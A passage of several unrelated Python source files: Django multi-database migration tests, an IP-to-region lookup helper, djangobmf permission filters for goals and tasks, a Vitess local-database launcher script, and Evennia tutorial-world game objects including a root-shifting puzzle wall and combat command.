            self._test_create_model("test_mltdb_crmo4", should_run=False)
        with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter(), MigrateNothingRouter()]):
            self._test_create_model("test_mltdb_crmo4", should_run=True)
    def _test_run_sql(self, app_label, should_run, hints=None):
        # Model setup uses an allow-everything router so the table exists
        # regardless of which router the test itself exercises.
        with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()]):
            project_state = self.set_up_test_model(app_label)
        sql = """
        INSERT INTO {0}_pony (pink, weight) VALUES (1, 3.55);
        INSERT INTO {0}_pony (pink, weight) VALUES (3, 5.0);
        """.format(app_label)
        operation = migrations.RunSQL(sql, hints=hints or {})
        # Test the state alteration does nothing
        new_state = project_state.clone()
        operation.state_forwards(app_label, new_state)
        self.assertEqual(new_state, project_state)
        # Test the database alteration
        self.assertEqual(project_state.apps.get_model(app_label, "Pony").objects.count(), 0)
        with connection.schema_editor() as editor:
            operation.database_forwards(app_label, editor, project_state, new_state)
        Pony = project_state.apps.get_model(app_label, "Pony")
        if should_run:
            self.assertEqual(Pony.objects.count(), 2)
        else:
            self.assertEqual(Pony.objects.count(), 0)
    @unittest.skipIf(sqlparse is None and connection.features.requires_sqlparse_for_splitting, "Missing sqlparse")
    @override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
    def test_run_sql(self):
        self._test_run_sql("test_mltdb_runsql", should_run=False)
    @unittest.skipIf(sqlparse is None and connection.features.requires_sqlparse_for_splitting, "Missing sqlparse")
    @override_settings(DATABASE_ROUTERS=[MigrateWhenFooRouter()])
    def test_run_sql2(self):
        # Without the hint the router refuses; with foo=True it allows.
        self._test_run_sql("test_mltdb_runsql2", should_run=False)
        self._test_run_sql("test_mltdb_runsql2", should_run=True, hints={'foo': True})
    def _test_run_python(self, app_label, should_run, hints=None):
        with override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()]):
            project_state = self.set_up_test_model(app_label)
        # Create the operation
        def inner_method(models, schema_editor):
            Pony = models.get_model(app_label, "Pony")
            Pony.objects.create(pink=1, weight=3.55)
            Pony.objects.create(weight=5)
        operation = migrations.RunPython(inner_method, hints=hints or {})
        # Test the state alteration does nothing
        new_state = project_state.clone()
        operation.state_forwards(app_label, new_state)
        self.assertEqual(new_state, project_state)
        # Test the database alteration
        self.assertEqual(project_state.apps.get_model(app_label, "Pony").objects.count(), 0)
        with connection.schema_editor() as editor:
            operation.database_forwards(app_label, editor, project_state, new_state)
        Pony = project_state.apps.get_model(app_label, "Pony")
        if should_run:
            self.assertEqual(Pony.objects.count(), 2)
        else:
            self.assertEqual(Pony.objects.count(), 0)
    @override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
    def test_run_python(self):
        self._test_run_python("test_mltdb_runpython", should_run=False)
    @override_settings(DATABASE_ROUTERS=[MigrateWhenFooRouter()])
    def test_run_python2(self):
        # Without the hint the router refuses; with foo=True it allows.
        self._test_run_python("test_mltdb_runpython2", should_run=False)
        self._test_run_python("test_mltdb_runpython2", should_run=True, hints={'foo': True})
|
import ipaddress
__all__ = [
'config_to_map',
'get_region'
]
def config_to_map(topology_config):
    """Convert a region -> [CIDR, ...] config into network -> region.

    args:
        topology_config: dict mapping region names to lists of CIDR
            strings, e.g. {'region1': ['10.1.1.0/24', ...], ...}.
            A region cannot be named "_default".

    returns:
        dict mapping ipaddress.ip_network objects to region names.

    raises:
        ValueError: if a region value is "_default" (or a CIDR string
            is invalid, propagated from ipaddress.ip_network).
    """
    topology_map = {}
    for region, networks in topology_config.items():
        # "_default" cannot be used as a region name
        if region == '_default':
            raise ValueError('cannot use "_default" as a region name')
        for net_str in networks:
            topology_map[ipaddress.ip_network(net_str)] = region
    return topology_map
def get_region(ip_str, topology_map):
    """Return the region whose network contains the given IP address.

    When several networks contain the IP, the most specific match
    (longest prefix length) wins; among equal-length prefixes the
    choice is undefined.

    args:
        ip_str: string representing an IP address
        topology_map: dict mapping ip_network objects to region names

    returns:
        string: region name
        None: if no region has been found

    raises:
        ValueError: raised by ipaddress if ip_str isn't a valid IP address
    """
    ip = ipaddress.ip_address(ip_str)
    # Collect every network that contains this address.
    candidates = [net for net in topology_map if ip in net]
    if not candidates:
        return None
    # Longest prefix == most specific match.
    best = max(candidates, key=lambda net: net.prefixlen)
    return topology_map[best]
|
from __future__ import unicode_literals
from django.db.models import Q
from djangobmf.utils import FilterQueryset
class GoalFilter(FilterQueryset):
    """Limit Goal querysets to the objects visible to the given user."""
    def filter_queryset(self, qs, user):
        # App-level managers see every goal.
        if user.has_perm('%s.can_manage' % qs.model._meta.app_label, qs.model):
            return qs
        # "or -1" keeps the clause from matching NULL fields when the user
        # has no employee record (-1 is never a valid primary key).
        qs_filter = Q(referee=user.djangobmf.employee or -1)
        qs_filter |= Q(employees=user.djangobmf.employee or -1)
        qs_filter |= Q(team__in=user.djangobmf.team)
        if hasattr(qs.model, "project"): # pragma: no branch
            # Resolve the model on the far side of the "project" relation.
            project = qs.model._meta.get_field_by_name("project")[0].model
            if user.has_perm('%s.can_manage' % project._meta.app_label, project):
                qs_filter |= Q(project__isnull=False)
            else:
                # Otherwise only goals of projects the user belongs to.
                qs_filter |= Q(project__isnull=False, project__employees=user.djangobmf.employee or -1)
                qs_filter |= Q(project__isnull=False, project__team__in=user.djangobmf.team)
        return qs.filter(qs_filter)
class TaskFilter(FilterQueryset):
    """Limit Task querysets to the objects visible to the given user."""
    def filter_queryset(self, qs, user):
        # Tasks attached to neither a project nor a goal are public.
        qs_filter = Q(project__isnull=True, goal__isnull=True)
        # "or -1" keeps the clause from matching NULL fields when the user
        # has no employee record (-1 is never a valid primary key).
        qs_filter |= Q(employee=user.djangobmf.employee or -1)
        # BUGFIX: this clause lacked the "or -1" guard used everywhere
        # else, so a user without an employee record matched every task
        # whose in_charge field is NULL.
        qs_filter |= Q(in_charge=user.djangobmf.employee or -1)
        if hasattr(qs.model, "goal"): # pragma: no branch
            # Resolve the model on the far side of the "goal" relation.
            goal = qs.model._meta.get_field_by_name("goal")[0].model
            if user.has_perm('%s.can_manage' % goal._meta.app_label, goal):
                qs_filter |= Q(goal__isnull=False)
            else:
                qs_filter |= Q(goal__isnull=False, goal__referee=user.djangobmf.employee or -1)
                qs_filter |= Q(goal__isnull=False, goal__employees=user.djangobmf.employee or -1)
                qs_filter |= Q(goal__isnull=False, goal__team__in=user.djangobmf.team)
        if hasattr(qs.model, "project"): # pragma: no branch
            project = qs.model._meta.get_field_by_name("project")[0].model
            if user.has_perm('%s.can_manage' % project._meta.app_label, project):
                qs_filter |= Q(project__isnull=False)
            else:
                qs_filter |= Q(project__isnull=False, project__employees=user.djangobmf.employee or -1)
                qs_filter |= Q(project__isnull=False, project__team__in=user.djangobmf.team)
        return qs.filter(qs_filter)
|
"""Command-line tool for starting a local Vitess database for testing.
USAGE:
$ run_local_database --port 12345 \
--topology test_keyspace/-80:test_keyspace_0,test_keyspace/80-:test_keyspace_1 \
--schema_dir /path/to/schema/dir
It will run the tool, logging to stderr. On stdout, a small json structure
can be waited on and then parsed by the caller to figure out how to reach
the vtgate process.
Once done with the test, send an empty line to this process for it to clean-up,
and then just wait for it to exit.
"""
import json
import logging
import optparse
import os
import re
import sys
from vttest import environment
from vttest import local_database
from vttest import mysql_flavor
from vttest import vt_processes
shard_exp = re.compile(r'(.+)/(.+):(.+)')
def main(port, topology, schema_dir, vschema, mysql_only):
  """Start a local Vitess cluster and block until stdin sends a line.

  Prints the cluster's connection parameters as a single json line on
  stdout, then waits for an empty line (or EOF) on stdin before the
  context manager tears the cluster down.
  """
  shards = []
  for shard in topology.split(','):
    m = shard_exp.match(shard)
    if m:
      shards.append(
          vt_processes.ShardInfo(m.group(1), m.group(2), m.group(3)))
    else:
      # BUGFIX: the message referred to a non-existent --shard flag;
      # this value actually comes from the --topology option.
      sys.stderr.write('invalid --topology flag format: %s\n' % shard)
      sys.exit(1)
  environment.base_port = port
  with local_database.LocalDatabase(shards, schema_dir, vschema, mysql_only) as local_db:
    # Parenthesized print behaves identically on Python 2 for a single value.
    print(json.dumps(local_db.config()))
    sys.stdout.flush()
    try:
      raw_input()
    except EOFError:
      sys.stderr.write(
          'WARNING: %s: No empty line was received on stdin.'
          ' Instead, stdin was closed and the cluster will be shut down now.'
          ' Make sure to send the empty line instead to proactively shutdown'
          ' the local cluster. For example, did you forget the shutdown in'
          ' your test\'s tearDown()?\n' % os.path.basename(__file__))
# Script entry point: parse flags, pick the MySQL flavor, run the cluster.
if __name__ == '__main__':
  parser = optparse.OptionParser()
  parser.add_option(
      '-p', '--port', type='int',
      help='Port to use for vtcombo. If this is 0, a random port '
      'will be chosen.')
  parser.add_option(
      '-t', '--topology',
      help='Define which shards exist in the test topology in the'
      ' form <keyspace>/<shardrange>:<dbname>,... The dbname'
      ' must be unique among all shards, since they share'
      ' a MySQL instance in the test environment.')
  parser.add_option(
      '-s', '--schema_dir',
      help='Directory for initial schema files. Within this dir,'
      ' there should be a subdir for each keyspace. Within'
      ' each keyspace dir, each file is executed as SQL'
      ' after the database is created on each shard.'
      ' If the directory contains a vschema.json file, it'
      ' will be used as the vschema for the V3 API.')
  parser.add_option(
      '-e', '--vschema',
      help='If this file is specified, it will be used'
      ' as the vschema for the V3 API.')
  parser.add_option(
      '-m', '--mysql_only', action='store_true',
      help='If this flag is set only mysql is initialized.'
      ' The rest of the vitess components are not started.'
      ' Also, the output specifies the mysql unix socket'
      ' instead of the vtgate port.')
  parser.add_option(
      '-v', '--verbose', action='store_true',
      help='Display extra error messages.')
  (options, args) = parser.parse_args()
  if options.verbose:
    logging.getLogger().setLevel(logging.DEBUG)
  # This will set the flavor based on the MYSQL_FLAVOR env var,
  # or default to MariaDB.
  mysql_flavor.set_mysql_flavor(None)
  main(options.port, options.topology, options.schema_dir, options.vschema, options.mysql_only)
|
"""
TutorialWorld - basic objects - Griatch 2011
This module holds all "dead" object definitions for
the tutorial world. Object-commands and -cmdsets
are also defined here, together with the object.
Objects:
TutorialObject
Readable
Climbable
Obelisk
LightSource
CrumblingWall
Weapon
WeaponRack
"""
from future.utils import listvalues
import random
from evennia import DefaultObject, DefaultExit, Command, CmdSet
from evennia import utils
from evennia.utils import search
from evennia.utils.spawner import spawn
class TutorialObject(DefaultObject):
    """
    This is the baseclass for all objects in the tutorial.
    """
    def at_object_creation(self):
        "Called when the object is first created."
        super(TutorialObject, self).at_object_creation()
        # Default info string; subclasses overwrite this with specifics.
        self.db.tutorial_info = "No tutorial info is available for this object."
    def reset(self):
        "Resets the object, whatever that may mean."
        # Default reset behaviour: send the object back to its home location.
        self.location = self.home
class CmdRead(Command):
    """
    Usage:
      read [obj]
    Read some text of a readable object.
    """
    key = "read"
    locks = "cmd:all()"
    help_category = "TutorialWorld"
    def func(self):
        """
        Show the target's `readable_text` Attribute, if it has one.
        """
        # With an argument, search for the named target; otherwise read
        # the object this command is defined on.
        target = self.caller.search(self.args.strip()) if self.args else self.obj
        if not target:
            return
        text = target.db.readable_text
        if text:
            output = "You read {C%s{n:\n %s" % (target.key, text)
        else:
            output = "There is nothing to read on %s." % target.key
        self.caller.msg(output)
class CmdSetReadable(CmdSet):
    """
    A CmdSet for readables.
    """
    def at_cmdset_creation(self):
        """
        Called when the cmdset is created.
        """
        # The set holds only the "read" command.
        self.add(CmdRead())
class Readable(TutorialObject):
    """
    This simple object defines some attributes and a cmdset providing
    the "read" command on itself.
    """
    def at_object_creation(self):
        """
        Called when object is created. We make sure to set the needed
        Attribute and add the readable cmdset.
        """
        super(Readable, self).at_object_creation()
        self.db.tutorial_info = "This is an object with a 'read' command defined in a command set on itself."
        self.db.readable_text = "There is no text written on %s." % self.key
        # define a command on the object.
        self.cmdset.add_default(CmdSetReadable, permanent=True)
class CmdClimb(Command):
    """
    Climb an object
    Usage:
      climb <object>
    This allows you to climb.
    """
    key = "climb"
    locks = "cmd:all()"
    help_category = "TutorialWorld"
    def func(self):
        "Handle the climb attempt."
        if not self.args:
            self.caller.msg("What do you want to climb?")
            return
        target = self.caller.search(self.args.strip())
        if not target:
            return
        # Only the object this command sits on can be climbed.
        if target != self.obj:
            self.caller.msg("Try as you might, you cannot climb that.")
            return
        feedback = self.obj.db.climb_text or \
            "You climb %s. Having looked around, you climb down again." % self.obj.name
        self.caller.msg(feedback)
        # set a tag on the caller to remember that we climbed.
        self.caller.tags.add("tutorial_climbed_tree", category="tutorial_world")
class CmdSetClimbable(CmdSet):
    "Climbing cmdset"
    def at_cmdset_creation(self):
        "populate set"
        # The set holds only the "climb" command.
        self.add(CmdClimb())
class Climbable(TutorialObject):
    """
    A climbable object. All that is special about it is that it has
    the "climb" command available on it.
    """
    def at_object_creation(self):
        "Called at initial creation only"
        # NOTE(review): unlike the sibling classes, this does not call
        # super(), so TutorialObject's tutorial_info default is not set.
        self.cmdset.add_default(CmdSetClimbable, permanent=True)
class Obelisk(TutorialObject):
    """
    This object changes its description randomly, and which is shown
    determines which order "clue id" is stored on the Character for
    future puzzles.
    Important Attribute:
       puzzle_descs (list): list of descriptions. One of these is
        picked randomly when this object is looked at and its index
        in the list is used as a key for to solve the puzzle.
    """
    def at_object_creation(self):
        "Called when object is created."
        super(Obelisk, self).at_object_creation()
        self.db.tutorial_info = "This object changes its desc randomly, and makes sure to remember which one you saw."
        # Placeholder; builders are expected to replace this list.
        self.db.puzzle_descs = ["You see a normal stone slab"]
        # make sure this can never be picked up
        self.locks.add("get:false()")
    def return_appearance(self, caller):
        """
        This hook is called by the look command to get the description
        of the object. We overload it with our own version.
        """
        # randomly get the index for one of the descriptions
        descs = self.db.puzzle_descs
        clueindex = random.randint(0, len(descs) - 1)
        # set this description, with the random extra
        string = "The surface of the obelisk seem to waver, shift and writhe under your gaze, with " \
                 "different scenes and structures appearing whenever you look at it. "
        self.db.desc = string + descs[clueindex]
        # remember that this was the clue we got. The Puzzle room will
        # look for this later to determine if you should be teleported
        # or not.
        caller.db.puzzle_clue = clueindex
        # call the parent function as normal (this will use
        # the new desc Attribute we just set)
        return super(Obelisk, self).return_appearance(caller)
class CmdLight(Command):
    """
    Creates light where there was none. Something to burn.
    """
    key = "on"
    aliases = ["light", "burn"]
    # only allow this command if command.obj is carried by caller.
    locks = "cmd:holds()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Light the lightsource. This command is designed to sit on a
        "lightable" object, so we only operate on self.obj.
        """
        if not self.obj.light():
            # light() returns False when the source is already lit
            self.caller.msg("%s is already burning." % self.obj.key)
            return
        self.caller.msg("You light %s." % self.obj.key)
        self.caller.location.msg_contents("%s lights %s!" % (self.caller, self.obj.key), exclude=[self.caller])
class CmdSetLight(CmdSet):
    """Command set holding the lightsource commands."""
    key = "lightsource_cmdset"
    # must be higher priority than the dark-room cmdset to win the merge
    priority = 3

    def at_cmdset_creation(self):
        """Populate the cmdset."""
        self.add(CmdLight())
class LightSource(TutorialObject):
    """
    This implements a light source object.

    When lit it burns for `db.burntime` seconds, then calls _burnout()
    and deletes itself. When burned out, the object will be deleted.
    """
    def at_init(self):
        """
        If this is called with the Attribute is_giving_light already
        set, we know that the timer got killed by a server
        reload/reboot before it had time to finish. So we kill it here
        instead. This is the price we pay for the simplicity of the
        non-persistent delay() method.
        """
        if self.db.is_giving_light:
            self.delete()

    def at_object_creation(self):
        """Called when object is first created; sets burn defaults."""
        super(LightSource, self).at_object_creation()
        self.db.tutorial_info = "This object can be lit to create light. It has a timeout for how long it burns."
        self.db.is_giving_light = False
        # how many seconds the source burns once lit
        self.db.burntime = 60 * 3  # 3 minutes
        # this is the default desc, it can of course be customized
        # when created.
        self.db.desc = "A splinter of wood with remnants of resin on it, enough for burning."
        # add the Light command
        self.cmdset.add_default(CmdSetLight, permanent=True)

    def _burnout(self):
        """
        This is called when this light source burns out. We make no
        use of the return value.
        """
        self.db.is_giving_light = False
        # Announce the burnout and re-trigger the room's light check.
        # The nested try/excepts cover the two placements: carried by
        # someone standing in a room, or lying directly on the floor.
        try:
            self.location.location.msg_contents("%s's %s flickers and dies." %
                                                (self.location, self.key), exclude=self.location)
            self.location.msg("Your %s flickers and dies." % self.key)
            self.location.location.check_light_state()
        except AttributeError:
            try:
                self.location.msg_contents("A %s on the floor flickers and dies." % self.key)
                # BUGFIX: when lying on the floor, self.location IS the
                # room; the old self.location.location.check_light_state()
                # hit the room's (usually None) location, raised
                # AttributeError and silently skipped the light re-check.
                self.location.check_light_state()
            except AttributeError:
                pass
        self.delete()

    def light(self):
        """
        Light this object - this is called by Light command.

        Returns True if we lit it, False if it was already burning.
        """
        if self.db.is_giving_light:
            return False
        self.db.is_giving_light = True
        # if we are in a dark room, trigger its light check
        try:
            self.location.location.check_light_state()
        except AttributeError:
            try:
                # maybe we are directly in the room
                self.location.check_light_state()
            except AttributeError:
                pass
        finally:
            # start the burn timer. When it runs out, self._burnout
            # will be called.
            # BUGFIX: honor the configurable burntime Attribute instead
            # of a hard-coded 3 minutes (default is still 60 * 3).
            utils.delay(self.db.burntime, self._burnout)
        return True
class CmdShiftRoot(Command):
    """
    Shifts roots around.
    Usage:
      shift blue root left/right
      shift red root left/right
      shift yellow root up/down
      shift green root up/down
    """
    key = "shift"
    aliases = ["shiftroot", "push", "pull", "move"]
    # we only allow to use this command while the
    # room is properly lit, so we lock it to the
    # setting of Attribute "is_lit" on our location.
    locks = "cmd:locattr(is_lit)"
    help_category = "TutorialWorld"

    def parse(self):
        """
        Custom parser; split input by spaces for simplicity.
        """
        self.arglist = self.args.strip().split()

    def func(self):
        """
        Implement the command.
          blue/red - vertical roots (moved left/right)
          yellow/green - horizontal roots (moved up/down)

        Positions run -1/0/1; two roots of the same orientation may never
        share a non-middle position, so a moved root pushes its sibling.
        The puzzle is solved when no root remains in the middle (0).
        """
        if not self.arglist:
            self.caller.msg("What do you want to move, and in what direction?")
            return
        if "root" in self.arglist:
            # we clean out the use of the word "root"
            self.arglist.remove("root")
        # we accept arguments on the form <color> <direction>
        if not len(self.arglist) > 1:
            self.caller.msg("You must define which colour of root you want to move, and in which direction.")
            return
        color = self.arglist[0].lower()
        direction = self.arglist[1].lower()
        # get current root positions dict (color -> -1/0/1)
        root_pos = self.obj.db.root_pos
        if not color in root_pos:
            self.caller.msg("No such root to move.")
            return
        # first, vertical roots (red/blue) - can be moved left/right
        if color == "red":
            if direction == "left":
                # clamp position to the [-1, 1] range
                root_pos[color] = max(-1, root_pos[color] - 1)
                self.caller.msg("You shift the reddish root to the left.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["blue"]:
                    # collided with the blue root off-center; push it aside
                    root_pos["blue"] += 1
                    self.caller.msg("The root with blue flowers gets in the way and is pushed to the right.")
            elif direction == "right":
                root_pos[color] = min(1, root_pos[color] + 1)
                self.caller.msg("You shove the reddish root to the right.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["blue"]:
                    root_pos["blue"] -= 1
                    self.caller.msg("The root with blue flowers gets in the way and is pushed to the left.")
            else:
                self.caller.msg("You cannot move the root in that direction.")
        elif color == "blue":
            if direction == "left":
                root_pos[color] = max(-1, root_pos[color] - 1)
                self.caller.msg("You shift the root with small blue flowers to the left.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["red"]:
                    root_pos["red"] += 1
                    self.caller.msg("The reddish root is to big to fit as well, so that one falls away to the left.")
            elif direction == "right":
                root_pos[color] = min(1, root_pos[color] + 1)
                self.caller.msg("You shove the root adorned with small blue flowers to the right.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["red"]:
                    root_pos["red"] -= 1
                    self.caller.msg("The thick reddish root gets in the way and is pushed back to the left.")
            else:
                self.caller.msg("You cannot move the root in that direction.")
        # now the horizontal roots (yellow/green). They can be moved up/down
        elif color == "yellow":
            if direction == "up":
                root_pos[color] = max(-1, root_pos[color] - 1)
                self.caller.msg("You shift the root with small yellow flowers upwards.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["green"]:
                    root_pos["green"] += 1
                    self.caller.msg("The green weedy root falls down.")
            elif direction == "down":
                root_pos[color] = min(1, root_pos[color] + 1)
                self.caller.msg("You shove the root adorned with small yellow flowers downwards.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["green"]:
                    root_pos["green"] -= 1
                    self.caller.msg("The weedy green root is shifted upwards to make room.")
            else:
                self.caller.msg("You cannot move the root in that direction.")
        elif color == "green":
            if direction == "up":
                root_pos[color] = max(-1, root_pos[color] - 1)
                self.caller.msg("You shift the weedy green root upwards.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["yellow"]:
                    root_pos["yellow"] += 1
                    self.caller.msg("The root with yellow flowers falls down.")
            elif direction == "down":
                root_pos[color] = min(1, root_pos[color] + 1)
                self.caller.msg("You shove the weedy green root downwards.")
                if root_pos[color] != 0 and root_pos[color] == root_pos["yellow"]:
                    root_pos["yellow"] -= 1
                    self.caller.msg("The root with yellow flowers gets in the way and is pushed upwards.")
            else:
                self.caller.msg("You cannot move the root in that direction.")
        # we have moved the root. Store new position back on the wall
        # (db Attributes need an explicit re-assignment to persist the
        # mutated dict)
        self.obj.db.root_pos = root_pos
        # Check victory condition
        # (listvalues is presumably a py2/3 compat helper imported at
        # the top of the file -- TODO confirm)
        if listvalues(root_pos).count(0) == 0:  # no roots in middle position
            # This will affect the cmd: lock of CmdPressButton
            self.obj.db.button_exposed = True
            self.caller.msg("Holding aside the root you think you notice something behind it ...")
class CmdPressButton(Command):
    """
    Presses a button.
    """
    key = "press"
    aliases = ["press button", "button", "push button"]
    # only accessible if the button was found and there is light. This checks
    # the Attribute button_exposed on the Wall object so that
    # you can only push the button when the puzzle is solved. It also
    # checks the is_lit Attribute on the location.
    locks = "cmd:objattr(button_exposed) and objlocattr(is_lit)"
    help_category = "TutorialWorld"

    def func(self):
        """Push the button and have the wall open its secret passage."""
        caller = self.caller
        if caller.db.crumbling_wall_found_exit:
            # we already pushed the button
            caller.msg("The button folded away when the secret passage opened. You cannot push it again.")
            return
        # echo the push to the pusher ...
        caller.msg("You move your fingers over the suspicious depression, then gives it a "
                   "decisive push. First nothing happens, then there is a rumble and a hidden "
                   "{wpassage{n opens, dust and pebbles rumbling as part of the wall moves aside.")
        # ... and to everyone else in the room
        room_string = ("%s moves their fingers over the suspicious depression, then gives it a "
                       "decisive push. First nothing happens, then there is a rumble and a hidden "
                       "{wpassage{n opens, dust and pebbles rumbling as part of the wall moves aside.")
        caller.location.msg_contents(room_string % caller.key, exclude=caller)
        # tell the wall object to turn itself into a real exit
        self.obj.open_wall()
class CmdSetCrumblingWall(CmdSet):
    """Command set grouping the CrumblingWall puzzle commands."""
    key = "crumblingwall_cmdset"
    priority = 2

    def at_cmdset_creation(self):
        """Populate the cmdset with the two puzzle commands."""
        self.add(CmdShiftRoot())
        self.add(CmdPressButton())
class CrumblingWall(TutorialObject, DefaultExit):
    """
    This is a custom Exit.

    The CrumblingWall can be examined in various ways, but only if a
    lit light source is in the room. The traversal itself is blocked
    by a traverse: lock on the exit that only allows passage if a
    certain attribute is set on the trying player.
    Important attribute
     destination - this property must be set to make this a valid exit
                   whenever the button is pushed (this hides it as an exit
                   until it actually is)
    """
    def at_init(self):
        """
        Called when object is recalled from cache; re-closes the wall
        so a reload never leaves the passage stuck open.
        """
        self.reset()

    def at_object_creation(self):
        """Called when the object is first created."""
        super(CrumblingWall, self).at_object_creation()
        self.aliases.add(["secret passage", "passage",
                          "crack", "opening", "secret door"])
        # starting root positions. H1/H2 are the horizontally hanging roots,
        # V1/V2 the vertically hanging ones. Each can have three positions:
        # (-1, 0, 1) where 0 means the middle position. yellow/green are
        # horizontal roots and red/blue vertical, all may have value 0, but n
        # ever any other identical value.
        self.db.root_pos = {"yellow": 0, "green": 0, "red": 0, "blue": 0}
        # flags controlling the puzzle victory conditions
        self.db.button_exposed = False
        self.db.exit_open = False
        # this is not even an Exit until it has a proper destination, and we won't assign
        # that until it is actually open. Until then we store the destination here. This
        # should be given a reasonable value at creation!
        self.db.destination = 2
        # we lock this Exit so that one can only execute commands on it
        # if its location is lit and only traverse it once the Attribute
        # exit_open is set to True.
        self.locks.add("cmd:locattr(is_lit);traverse:objattr(exit_open)")
        # set cmdset
        self.cmdset.add(CmdSetCrumblingWall, permanent=True)

    def open_wall(self):
        """
        This method is called by the push button command once the puzzle
        is solved. It opens the wall and sets a timer for it to reset
        itself.
        """
        # this will make it into a proper exit (this returns a list)
        eloc = search.search_object(self.db.destination)
        if not eloc:
            # NOTE(review): Exits have no `caller` attribute, so this
            # error branch would itself raise AttributeError if the
            # destination object is missing -- confirm intended recipient.
            self.caller.msg("The exit leads nowhere, there's just more stone behind it ...")
        else:
            self.destination = eloc[0]
            # BUGFIX: must be stored as a db Attribute -- both the
            # "traverse:objattr(exit_open)" lock and return_appearance()
            # read self.db.exit_open. The old plain-attribute assignment
            # (self.exit_open = True) was invisible to them, so the wall
            # could never actually be traversed.
            self.db.exit_open = True
        # start a 45 second timer before closing again
        utils.delay(45, self.reset)

    def _translate_position(self, root, ipos):
        """Translate a root's (color, position) pair into a sentence."""
        rootnames = {"red": "The {rreddish{n vertical-hanging root ",
                     "blue": "The thick vertical root with {bblue{n flowers ",
                     "yellow": "The thin horizontal-hanging root with {yyellow{n flowers ",
                     "green": "The weedy {ggreen{n horizontal root "}
        vpos = {-1: "hangs far to the {wleft{n on the wall.",
                0: "hangs straight down the {wmiddle{n of the wall.",
                1: "hangs far to the {wright{n of the wall."}
        hpos = {-1: "covers the {wupper{n part of the wall.",
                0: "passes right over the {wmiddle{n of the wall.",
                1: "nearly touches the floor, near the {wbottom{n of the wall."}
        if root in ("yellow", "green"):
            string = rootnames[root] + hpos[ipos]
        else:
            string = rootnames[root] + vpos[ipos]
        return string

    def return_appearance(self, caller):
        """
        This is called when someone looks at the wall. We need to echo the
        current root positions.
        """
        if self.db.button_exposed:
            # we found the button by moving the roots
            string = "Having moved all the roots aside, you find that the center of the wall, " \
                     "previously hidden by the vegetation, hid a curious square depression. It was maybe once " \
                     "concealed and made to look a part of the wall, but with the crumbling of stone around it," \
                     "it's now easily identifiable as some sort of button."
        elif self.db.exit_open:
            # we pressed the button; the exit is open
            string = "With the button pressed, a crack has opened in the root-covered wall, just wide enough " \
                     "to squeeze through. A cold draft is coming from the hole and you get the feeling the " \
                     "opening may close again soon."
        else:
            # puzzle not solved yet.
            string = "The wall is old and covered with roots that here and there have permeated the stone. " \
                     "The roots (or whatever they are - some of them are covered in small non-descript flowers) " \
                     "crisscross the wall, making it hard to clearly see its stony surface. Maybe you could " \
                     "try to {wshift{n or {wmove{n them.\n"
            # display the root positions to help with the puzzle
            for key, pos in self.db.root_pos.items():
                string += "\n" + self._translate_position(key, pos)
        self.db.desc = string
        # call the parent to continue execution (will use the desc we just set)
        return super(CrumblingWall, self).return_appearance(caller)

    def at_after_traverse(self, traverser, source_location):
        """
        This is called after we traversed this exit. Cleans up and resets
        the puzzle.
        """
        # BUGFIX: the attribute name was misspelled
        # ("crumbling_wall_found_buttothe"); clear the correctly-named flag.
        del traverser.db.crumbling_wall_found_button
        del traverser.db.crumbling_wall_found_exit
        self.reset()

    def at_failed_traverse(self, traverser):
        """This is called if the player fails to pass the Exit."""
        traverser.msg("No matter how you try, you cannot force yourself through %s." % self.key)

    def reset(self):
        """
        Called by tutorial world runner, or whenever someone successfully
        traversed the Exit.
        """
        self.location.msg_contents("The secret door closes abruptly, roots falling back into place.")
        # reset the flags and remove the exit destination
        self.db.button_exposed = False
        self.db.exit_open = False
        self.destination = None
        # Reset the roots with some random starting positions for the roots:
        start_pos = [{"yellow": 1, "green": 0, "red": 0, "blue": 0},
                     {"yellow": 0, "green": 0, "red": 0, "blue": 0},
                     {"yellow": 0, "green": 1, "red": -1, "blue": 0},
                     {"yellow": 1, "green": 0, "red": 0, "blue": 0},
                     {"yellow": 0, "green": 0, "red": 0, "blue": 1}]
        self.db.root_pos = random.choice(start_pos)
class CmdAttack(Command):
    """
    Attack the enemy. Commands:
      stab <enemy>
      slash <enemy>
      parry
    stab - (thrust) makes a lot of damage but is harder to hit with.
    slash - is easier to land, but does not make as much damage.
    parry - forgoes your attack but will make you harder to hit on next
            enemy attack.
    """
    # this is an example of implementing many commands as a single
    # command class, using the given command alias to separate between them.
    key = "attack"
    aliases = ["hit", "kill", "fight", "thrust", "pierce", "stab",
               "slash", "chop", "parry", "defend"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Resolve one round of attack (or parry), dispatching on which
        alias was used to invoke the command.
        """
        cmdstring = self.cmdstring
        if cmdstring in ("attack", "fight"):
            # generic invocation - ask for a specific attack form
            string = "How do you want to fight? Choose one of 'stab', 'slash' or 'defend'."
            self.caller.msg(string)
            return
        # parry mode
        if cmdstring in ("parry", "defend"):
            string = "You raise your weapon in a defensive pose, ready to block the next enemy attack."
            self.caller.msg(string)
            self.caller.db.combat_parry_mode = True
            self.caller.location.msg_contents("%s takes a defensive stance" % self.caller, exclude=[self.caller])
            return
        if not self.args:
            self.caller.msg("Who do you attack?")
            return
        target = self.caller.search(self.args.strip())
        if not target:
            return
        # message templates: to attacker, target, and onlookers
        string = ""
        tstring = ""
        ostring = ""
        if cmdstring in ("thrust", "pierce", "stab"):
            hit = float(self.obj.db.hit) * 0.7  # modified due to stab
            damage = self.obj.db.damage * 2  # modified due to stab
            string = "You stab with %s. " % self.obj.key
            tstring = "%s stabs at you with %s. " % (self.caller.key, self.obj.key)
            ostring = "%s stabs at %s with %s. " % (self.caller.key, target.key, self.obj.key)
            self.caller.db.combat_parry_mode = False
        elif cmdstring in ("slash", "chop"):
            hit = float(self.obj.db.hit)  # un modified due to slash
            damage = self.obj.db.damage  # un modified due to slash
            string = "You slash with %s. " % self.obj.key
            tstring = "%s slash at you with %s. " % (self.caller.key, self.obj.key)
